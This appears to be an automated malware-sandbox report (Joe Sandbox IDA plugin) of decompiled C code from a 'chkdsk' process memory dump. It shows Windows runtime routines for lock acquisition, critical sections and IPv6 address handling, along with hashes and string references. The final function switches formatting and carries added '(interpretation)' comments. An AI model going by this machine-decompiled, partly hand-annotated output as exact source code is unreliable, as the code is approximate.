                                          															E023D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                          															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                          															_push( &_a4);
                                          															_push(1);
                                          															_t63 = E0238F970( *((intOrPtr*)(_t138 + 0x20)));
                                          															__eflags = _t63;
                                          															if(__eflags >= 0) {
                                          																goto L2;
                                          															} else {
                                          																_push(_t63);
                                          																_t66 = E023D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                          																asm("int3");
                                          																while(1) {
                                          																	_t110 = _t66;
                                          																	__eflags = _t66 - 1;
                                          																	if(_t66 != 1) {
                                          																		break;
                                          																	}
                                          																	_t128 = _t128 | 0xffffffff;
                                          																	_t66 = _t110;
                                          																	asm("lock cmpxchg [ebx], edi");
                                          																	__eflags = _t66 - _t110;
                                          																	if(_t66 != _t110) {
                                          																		continue;
                                          																	} else {
                                          																		_t67 =  *[fs:0x18];
                                          																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                          																		return _t67;
                                          																	}
                                          																	goto L59;
                                          																}
                                          																E023B5329(_t110, _t138);
                                          																_t69 = E023B53A5(_t138, 1);
                                          																return _t69;
                                          															}
                                          														}
                                          													}
                                          												}
                                          											} else {
                                          												_t56 =  *(_t96 + 0x28);
                                          												goto L3;
                                          											}
                                          										} else {
                                          											_t107 =  *_t119;
                                          											__eflags = _t107;
                                          											if(__eflags > 0) {
                                          												while(1) {
                                          													_t81 = _t107;
                                          													asm("lock cmpxchg [edi], esi");
                                          													__eflags = _t81 - _t107;
                                          													if(_t81 == _t107) {
                                          														break;
                                          													}
                                          													_t107 = _t81;
                                          													__eflags = _t81;
                                          													if(_t81 > 0) {
                                          														continue;
                                          													}
                                          													break;
                                          												}
                                          												_t56 = _a4;
                                          												__eflags = _t107;
                                          											}
                                          											if(__eflags != 0) {
                                          												while(1) {
                                          													L3:
                                          													__eflags = _t56;
                                          													if(_t56 != 0) {
                                          														goto L32;
                                          													}
                                          													_t107 = _t107 | 0xffffffff;
                                          													_t56 = 0;
                                          													asm("lock cmpxchg [edx], ecx");
                                          													__eflags = 0;
                                          													if(0 != 0) {
                                          														continue;
                                          													} else {
                                          														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          														return 1;
                                          													}
                                          													goto L59;
                                          												}
                                          												continue;
                                          											} else {
                                          												goto L40;
                                          											}
                                          										}
                                          										goto L59;
                                          									}
                                          									__eflags = 0;
                                          									return 0;
                                          								} else {
                                          									_t115 =  *(_t96 + 0x28);
                                          									continue;
                                          								}
                                          							} else {
                                          								_t106 =  *_t49;
                                          								__eflags = _t106;
                                          								if(__eflags > 0) {
                                          									while(1) {
                                          										_t93 = _t106;
                                          										asm("lock cmpxchg [edi], esi");
                                          										__eflags = _t93 - _t106;
                                          										if(_t93 == _t106) {
                                          											break;
                                          										}
                                          										_t106 = _t93;
                                          										__eflags = _t93;
                                          										if(_t93 > 0) {
                                          											continue;
                                          										}
                                          										break;
                                          									}
                                          									__eflags = _t106;
                                          								}
                                          								if(__eflags != 0) {
                                          									continue;
                                          								} else {
                                          									goto L23;
                                          								}
                                          							}
                                          						}
                                          						goto L59;
                                          					}
                                          					_t84 = _t115;
                                          					asm("lock cmpxchg [esi], ecx");
                                          					__eflags = _t84 - _t115;
                                          					if(_t84 != _t115) {
                                          						_t115 = _t84;
                                          						goto L7;
                                          					} else {
                                          						return 1;
                                          					}
                                          				}
                                          				L59:
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023F2206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
• Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: fc76838219d53a557de8ac523783fdad34fa202c05613213f3c86de0ad649ee8
                                          • Instruction ID: 7bd2697c4c439f6a53baf684d1c21640f89f099b7d5de3074e807043ef644491
                                          • Opcode Fuzzy Hash: fc76838219d53a557de8ac523783fdad34fa202c05613213f3c86de0ad649ee8
                                          • Instruction Fuzzy Hash: 54516B31700311AFEF65CA18EC81FA733AAAF84714F218259FE15DB381DA71EC428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E023D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                          				signed int _v8;
                                          				char _v10;
                                          				char _v140;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t24;
                                          				void* _t26;
                                          				signed int _t29;
                                          				signed int _t34;
                                          				signed int _t40;
                                          				intOrPtr _t45;
                                          				void* _t51;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				signed int _t57;
                                          				void* _t58;
                                          
                                          				_t51 = __edx;
                                          				_t24 =  *0x2472088; // 0x76ee1647
                                          				_v8 = _t24 ^ _t57;
                                          				_t45 = _a16;
                                          				_t53 = _a4;
                                          				_t52 = _a20;
                                          				if(_a4 == 0 || _t52 == 0) {
                                          					L10:
                                          					_t26 = 0xc000000d;
                                          				} else {
                                          					if(_t45 == 0) {
                                          						if( *_t52 == _t45) {
                                          							goto L3;
                                          						} else {
                                          							goto L10;
                                          						}
                                          					} else {
                                          						L3:
                                          						_t28 =  &_v140;
                                          						if(_a12 != 0) {
                                          							_push("[");
                                          							_push(0x41);
                                          							_push( &_v140);
                                          							_t29 = E023C7707();
                                          							_t58 = _t58 + 0xc;
                                          							_t28 = _t57 + _t29 * 2 - 0x88;
                                          						}
                                          						_t54 = E023D13CB(_t53, _t28);
                                          						if(_a8 != 0) {
                                          							_t34 = E023C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                          							_t58 = _t58 + 0x10;
                                          							_t54 = _t54 + _t34 * 2;
                                          						}
                                          						if(_a12 != 0) {
                                          							_t40 = E023C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                          							_t58 = _t58 + 0x10;
                                          							_t54 = _t54 + _t40 * 2;
                                          						}
                                          						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                          						 *_t52 = _t53;
                                          						if( *_t52 < _t53) {
                                          							goto L10;
                                          						} else {
                                          							E02392340(_t45,  &_v140, _t53 + _t53);
                                          							_t26 = 0;
                                          						}
                                          					}
                                          				}
                                          				return E0239E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                          			}

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 023FEA22
                                            • Part of subcall function 023D13CB: ___swprintf_l.LIBCMT ref: 023D146B
                                            • Part of subcall function 023D13CB: ___swprintf_l.LIBCMT ref: 023D1490
                                          • ___swprintf_l.LIBCMT ref: 023D156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: e7aefb095ab8004032baac0f69ee36e561c2abb5eb0feebd338a4f02ff9b4b71
                                          • Instruction ID: a2875271ea7575b2cc6b65ec09e7f5e6e737653f76c49bec6c9973e04acba483
                                          • Opcode Fuzzy Hash: e7aefb095ab8004032baac0f69ee36e561c2abb5eb0feebd338a4f02ff9b4b71
                                          • Instruction Fuzzy Hash: 932195739002199BDF20DE68EC40AEA77BDAB10704F444566ED8AD3140DB75EA58CFE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 45%
                                          			E023B53A5(signed int _a4, char _a8) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t32;
                                          				signed int _t37;
                                          				signed int _t40;
                                          				signed int _t42;
                                          				void* _t45;
                                          				intOrPtr _t46;
                                          				void* _t48;
                                          				signed int _t49;
                                          				void* _t51;
                                          				signed int _t57;
                                          				signed int _t64;
                                          				signed int _t71;
                                          				void* _t74;
                                          				intOrPtr _t78;
                                          				signed int* _t79;
                                          				void* _t85;
                                          				signed int _t86;
                                          				signed int _t92;
                                          				void* _t104;
                                          				void* _t105;
                                          
                                          				_t64 = _a4;
                                          				_t32 =  *(_t64 + 0x28);
                                          				_t71 = _t64 + 0x28;
                                          				_push(_t92);
                                          				if(_t32 < 0) {
                                          					_t78 =  *[fs:0x18];
                                          					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                          					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                          						goto L3;
                                          					} else {
                                          						__eflags = _t32 | 0xffffffff;
                                          						asm("lock xadd [ecx], eax");
                                          						return 1;
                                          					}
                                          				} else {
                                          					L3:
                                          					_push(_t86);
                                          					while(1) {
                                          						L4:
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							break;
                                          						}
                                          						__eflags = _a8;
                                          						if(_a8 == 0) {
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                          							_t79 = _t64 + 0x24;
                                          							_t71 = 1;
                                          							asm("lock xadd [eax], ecx");
                                          							_t32 =  *(_t64 + 0x28);
                                          							_a4 = _t32;
                                          							__eflags = _t32;
                                          							if(_t32 != 0) {
                                          								L19:
                                          								_t86 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                          									asm("sbb esi, esi");
                                          									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x024701c0;
                                          									_push(_t92);
                                          									_push(0);
                                          									_t37 = E0238F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                          									__eflags = _t37 - 0x102;
                                          									if(_t37 != 0x102) {
                                          										break;
                                          									}
                                          									_t71 =  *(_t92 + 4);
                                          									_t85 =  *_t92;
                                          									_t51 = E023D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                          									_push(_t85);
                                          									_push(_t51);
                                          									E023E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                          									E023E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                          									_t86 = _t86 + 1;
                                          									_t105 = _t104 + 0x28;
                                          									__eflags = _t86 - 2;
                                          									if(__eflags > 0) {
                                          										E0241217A(_t71, __eflags, _t64);
                                          									}
                                          									_push("RTL: Re-Waiting\n");
                                          									_push(0);
                                          									_push(0x65);
                                          									E023E3F92();
                                          									_t104 = _t105 + 0xc;
                                          								}
                                          								__eflags = _t37;
                                          								if(__eflags < 0) {
                                          									_push(_t37);
                                          									E023D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                          									asm("int3");
                                          									_t40 =  *_t71;
                                          									 *_t71 = 0;
                                          									__eflags = _t40;
                                          									if(_t40 == 0) {
                                          										L1:
                                          										_t42 = E023B5384(_t92 + 0x24);
                                          										if(_t42 != 0) {
                                          											goto L31;
                                          										} else {
                                          											goto L2;
                                          										}
                                          									} else {
                                          										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                          										_push( &_a4);
                                          										_push(_t40);
                                          										_t49 = E0238F970( *((intOrPtr*)(_t92 + 0x18)));
                                          										__eflags = _t49;
                                          										if(__eflags >= 0) {
                                          											goto L1;
                                          										} else {
                                          											_push(_t49);
                                          											E023D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                          											L31:
                                          											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                          											_push( &_a4);
                                          											_push(1);
                                          											_t42 = E0238F970( *((intOrPtr*)(_t92 + 0x20)));
                                          											__eflags = _t42;
                                          											if(__eflags >= 0) {
                                          												L2:
                                          												return _t42;
                                          											} else {
                                          												_push(_t42);
                                          												E023D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                          												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                          												_push( &_a4);
                                          												_push(1);
                                          												_t42 = E0238F970( *((intOrPtr*)(_t92 + 0x20)));
                                          												__eflags = _t42;
                                          												if(__eflags >= 0) {
                                          													goto L2;
                                          												} else {
                                          													_push(_t42);
                                          													_t45 = E023D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                          													asm("int3");
                                          													while(1) {
                                          														_t74 = _t45;
                                          														__eflags = _t45 - 1;
                                          														if(_t45 != 1) {
                                          															break;
                                          														}
                                          														_t86 = _t86 | 0xffffffff;
                                          														_t45 = _t74;
                                          														asm("lock cmpxchg [ebx], edi");
                                          														__eflags = _t45 - _t74;
                                          														if(_t45 != _t74) {
                                          															continue;
                                          														} else {
                                          															_t46 =  *[fs:0x18];
                                          															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                          															return _t46;
                                          														}
                                          														goto L38;
                                          													}
                                          													E023B5329(_t74, _t92);
                                          													_push(1);
                                          													_t48 = E023B53A5(_t92);
                                          													return _t48;
                                          												}
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									_t32 =  *(_t64 + 0x28);
                                          									continue;
                                          								}
                                          							} else {
                                          								_t71 =  *_t79;
                                          								__eflags = _t71;
                                          								if(__eflags > 0) {
                                          									while(1) {
                                          										_t57 = _t71;
                                          										asm("lock cmpxchg [edi], esi");
                                          										__eflags = _t57 - _t71;
                                          										if(_t57 == _t71) {
                                          											break;
                                          										}
                                          										_t71 = _t57;
                                          										__eflags = _t57;
                                          										if(_t57 > 0) {
                                          											continue;
                                          										}
                                          										break;
                                          									}
                                          									_t32 = _a4;
                                          									__eflags = _t71;
                                          								}
                                          								if(__eflags != 0) {
                                          									continue;
                                          								} else {
                                          									goto L19;
                                          								}
                                          							}
                                          						}
                                          						goto L38;
                                          					}
                                          					_t71 = _t71 | 0xffffffff;
                                          					_t32 = 0;
                                          					asm("lock cmpxchg [edx], ecx");
                                          					__eflags = 0;
                                          					if(0 != 0) {
                                          						goto L4;
                                          					} else {
                                          						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          						return 1;
                                          					}
                                          				}
                                          				L38:
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023F22F4
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023F22FC
                                          • RTL: Re-Waiting, xrefs: 023F2328
                                          • RTL: Resource at %p, xrefs: 023F230B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 53fea3e0dab07b3629bd6896e3d35d0717a1803bf8b9042eb5f49b3489cb4d42
                                          • Instruction ID: 7b6b4eab337d33e0e2737e9a7538ceb9d7b0a8f697cc8a08a03c4a915c61e361
                                          • Opcode Fuzzy Hash: 53fea3e0dab07b3629bd6896e3d35d0717a1803bf8b9042eb5f49b3489cb4d42
                                          • Instruction Fuzzy Hash: 0D51E671601715ABEB619F68DC80FA773A9AF44324F104259FE09DB780E771E8468B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E023BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v24;
                                          				intOrPtr* _v28;
                                          				intOrPtr _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				short _v66;
                                          				char _v72;
                                          				void* __esi;
                                          				intOrPtr _t38;
                                          				intOrPtr _t39;
                                          				signed int _t40;
                                          				intOrPtr _t42;
                                          				intOrPtr _t43;
                                          				signed int _t44;
                                          				void* _t46;
                                          				intOrPtr _t48;
                                          				signed int _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr _t53;
                                          				signed char _t67;
                                          				void* _t72;
                                          				intOrPtr _t77;
                                          				intOrPtr* _t80;
                                          				intOrPtr _t84;
                                          				intOrPtr* _t85;
                                          				void* _t91;
                                          				void* _t92;
                                          				void* _t93;
                                          
                                          				_t80 = __edi;
                                          				_t75 = __edx;
                                          				_t70 = __ecx;
                                          				_t84 = _a4;
                                          				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                          					E023ADA92(__ecx, __edx, __eflags, _t84);
                                          					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                          				}
                                          				_push(0);
                                          				__eflags = _t38 - 0xffffffff;
                                          				if(_t38 == 0xffffffff) {
                                          					_t39 =  *0x247793c; // 0x0
                                          					_push(0);
                                          					_push(_t84);
                                          					_t40 = E023916C0(_t39);
                                          				} else {
                                          					_t40 = E0238F9D4(_t38);
                                          				}
                                          				_pop(_t85);
                                          				__eflags = _t40;
                                          				if(__eflags < 0) {
                                          					_push(_t40);
                                          					E023D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                          					asm("int3");
                                          					while(1) {
                                          						L21:
                                          						_t76 =  *[fs:0x18];
                                          						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                          						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                          						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                          							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                          							_v66 = 0x1722;
                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                          							_t76 =  &_v72;
                                          							_push( &_v72);
                                          							_v28 = _t85;
                                          							_v40 =  *((intOrPtr*)(_t85 + 4));
                                          							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                          							_push(0x10);
                                          							_push(0x20402);
                                          							E023901A4( *0x7ffe0382 & 0x000000ff);
                                          						}
                                          						while(1) {
                                          							_t43 = _v8;
                                          							_push(_t80);
                                          							_push(0);
                                          							__eflags = _t43 - 0xffffffff;
                                          							if(_t43 == 0xffffffff) {
                                          								_t71 =  *0x247793c; // 0x0
                                          								_push(_t85);
                                          								_t44 = E02391F28(_t71);
                                          							} else {
                                          								_t44 = E0238F8CC(_t43);
                                          							}
                                          							__eflags = _t44 - 0x102;
                                          							if(_t44 != 0x102) {
                                          								__eflags = _t44;
                                          								if(__eflags < 0) {
                                          									_push(_t44);
                                          									E023D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                          									asm("int3");
                                          									E02412306(_t85);
                                          									__eflags = _t67 & 0x00000002;
                                          									if((_t67 & 0x00000002) != 0) {
                                          										_t7 = _t67 + 2; // 0x4
                                          										_t72 = _t7;
                                          										asm("lock cmpxchg [edi], ecx");
                                          										__eflags = _t67 - _t67;
                                          										if(_t67 == _t67) {
                                          											E023BEC56(_t72, _t76, _t80, _t85);
                                          										}
                                          									}
                                          									return 0;
                                          								} else {
                                          									__eflags = _v24;
                                          									if(_v24 != 0) {
                                          										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                          									}
                                          									return 2;
                                          								}
                                          								goto L36;
                                          							}
                                          							_t77 =  *((intOrPtr*)(_t80 + 4));
                                          							_push(_t67);
                                          							_t46 = E023D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                          							_push(_t77);
                                          							E023E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                          							_t48 =  *_t85;
                                          							_t92 = _t91 + 0x18;
                                          							__eflags = _t48 - 0xffffffff;
                                          							if(_t48 == 0xffffffff) {
                                          								_t49 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                          							}
                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                          							_push(_t49);
                                          							_t50 = _v12;
                                          							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                          							_push(_t85);
                                          							_push( *((intOrPtr*)(_t85 + 0xc)));
                                          							_push( *((intOrPtr*)(_t50 + 0x24)));
                                          							E023E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                          							_t53 =  *_t85;
                                          							_t93 = _t92 + 0x20;
                                          							_t67 = _t67 + 1;
                                          							__eflags = _t53 - 0xffffffff;
                                          							if(_t53 != 0xffffffff) {
                                          								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                          								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                          							}
                                          							__eflags = _t67 - 2;
                                          							if(_t67 > 2) {
                                          								__eflags = _t85 - 0x24720c0;
                                          								if(_t85 != 0x24720c0) {
                                          									_t76 = _a4;
                                          									__eflags = _a4 - _a8;
                                          									if(__eflags == 0) {
                                          										E0241217A(_t71, __eflags, _t85);
                                          									}
                                          								}
                                          							}
                                          							_push("RTL: Re-Waiting\n");
                                          							_push(0);
                                          							_push(0x65);
                                          							_a8 = _a4;
                                          							E023E3F92();
                                          							_t91 = _t93 + 0xc;
                                          							__eflags =  *0x7ffe0382;
                                          							if( *0x7ffe0382 != 0) {
                                          								goto L21;
                                          							}
                                          						}
                                          						goto L36;
                                          					}
                                          				} else {
                                          					return _t40;
                                          				}
                                          				L36:
                                          			}

                                          Strings
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 023F248D
                                          • RTL: Re-Waiting, xrefs: 023F24FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023F24BD
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: 7816b595808c3370cad322c74d866344e8a92094b6d4ff897033e60573083bd5
                                          • Instruction ID: 6391b6fac6ca7440c9b9051c49f3d43f0af403f910edc8336871d1992c8f960b
                                          • Opcode Fuzzy Hash: 7816b595808c3370cad322c74d866344e8a92094b6d4ff897033e60573083bd5
                                          • Instruction Fuzzy Hash: 8041C2B0600204ABDB20DF68DC85FAB77A9EF45320F108605FA699B6D1D774E941CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E023CFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _t105;
                                          				void* _t110;
                                          				char _t114;
                                          				short _t115;
                                          				void* _t118;
                                          				signed short* _t119;
                                          				short _t120;
                                          				char _t122;
                                          				void* _t127;
                                          				void* _t130;
                                          				signed int _t136;
                                          				intOrPtr _t143;
                                          				signed int _t158;
                                          				signed short* _t164;
                                          				signed int _t167;
                                          				void* _t170;
                                          
                                          				_t158 = 0;
                                          				_t164 = _a4;
                                          				_v20 = 0;
                                          				_v24 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_v16 = 0;
                                          				_v28 = 0;
                                          				_t136 = 0;
                                          				while(1) {
                                          					_t167 =  *_t164 & 0x0000ffff;
                                          					if(_t167 == _t158) {
                                          						break;
                                          					}
                                          					_t118 = _v20 - _t158;
                                          					if(_t118 == 0) {
                                          						if(_t167 == 0x3a) {
                                          							if(_v12 > _t158 || _v8 > _t158) {
                                          								break;
                                          							} else {
                                          								_t119 =  &(_t164[1]);
                                          								if( *_t119 != _t167) {
                                          									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) { // more than four digits in one group
										L29:
										return 0xc000000d; // STATUS_INVALID_PARAMETER
									}
									_t120 = E023CEE02(_v24, _t158, 0x10); // strtoul-like conversion of the group text, radix 16 (interpretation)
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) { // more than three digits in one decimal part
									goto L29;
								}
								_t122 = E023CEE02(_v24, _t158, 0xa); // same conversion, radix 10
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) { // a decimal part must fit one octet
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E023C685D(_t167, 4) == 0) { // character-class test; 4 is C1_DIGIT in the Windows ctype flags (interpretation)
								if(E023C685D(_t167, 0x80) != 0) { // 0x80 is C1_XDIGIT: a hex digit a-f/A-F
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1; // a letter was seen, so no dotted-quad tail can follow
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) { // ':' group separator; a second ':' directly after it is the "::" marker
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) { // no ':' after a '.', and at most seven separators
								break;
							} else {
								_t119 =  &(_t164[1]);
